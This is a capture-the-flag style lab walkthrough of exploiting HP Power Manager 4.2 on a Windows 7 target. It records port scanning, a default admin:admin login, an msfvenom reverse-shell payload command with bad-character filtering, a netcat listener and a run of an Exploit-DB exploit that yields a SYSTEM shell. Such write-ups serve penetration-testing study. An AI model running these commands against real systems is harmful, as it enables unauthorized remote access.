Enumeration

rustscan -a 192.168.152.45 --ulimit 5000

Open 192.168.152.45:80
Open 192.168.152.45:135
Open 192.168.152.45:139
Open 192.168.152.45:445
Open 192.168.152.45:3389
Open 192.168.152.45:3573
Open 192.168.152.45:49153
Open 192.168.152.45:49155
Open 192.168.152.45:49154
Open 192.168.152.45:49152
Open 192.168.152.45:49159
Open 192.168.152.45:49158

From the ports that are open we can tell that we will be attacking a target running Windows (135, 139, 445, 3389)

Lets also run a verbose nmap scan to see if we can gather any data on these open ports

nmap -sCVS 192.168.152.45

Our target is running Windows 7 lol

Pasted image 20250217202502.png

Lets check these SMB shares, lets see if guest login is allowed with crackmapexec.

Pasted image 20250217202848.png

Good thing they disabled the guest account.

Lets check the service running on port 80
Pasted image 20250217202552.png

I have never seen this before but hey, there is no way the login credentials will be admin:admin, right?

Pasted image 20250217202636.png

Well...

We are in, and some quick research on the site shows that the version of this software can be exploited.

Pasted image 20250217203758.png

This is an older lab but its cool to see these attacks in action.

Google key search "HP Power Manager 4.2 (Build 7) exploit" and we come across an Exploit-DB page with a juicy exploit we can use on this target:https://www.exploit-db.com/exploits/10099

It looks like we are going to need to modify this script for our needs so we can capture the reverse shell.

Pasted image 20250217204041.png

The creator of the script utilizes alphanumeric shell code.

This is likely because of the character filtering that is used in the HP Power Manager tool.

We can easily replace this shell code with our own using msfvenom.

msfvenom -p windows/shell_reverse_tcp -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" LHOST=$IP LPORT=4444 -e x86/alpha_mixed -f c

Note that we got the bad characters we need for this code shell from reading the some of the documentation that the script creator left for us here:

Pasted image 20250217204616.png

We replace the alphanumeric shell code with out own from the generated output of our msfvenom command.

Now lets run this script and set up a listener

nc -lvnp 4444

python2 10099.py 192.168.152.45

Pasted image 20250217205020.png

And it looks like we already have root access, no privilege escalation required... sick!

Pasted image 20250217205253.png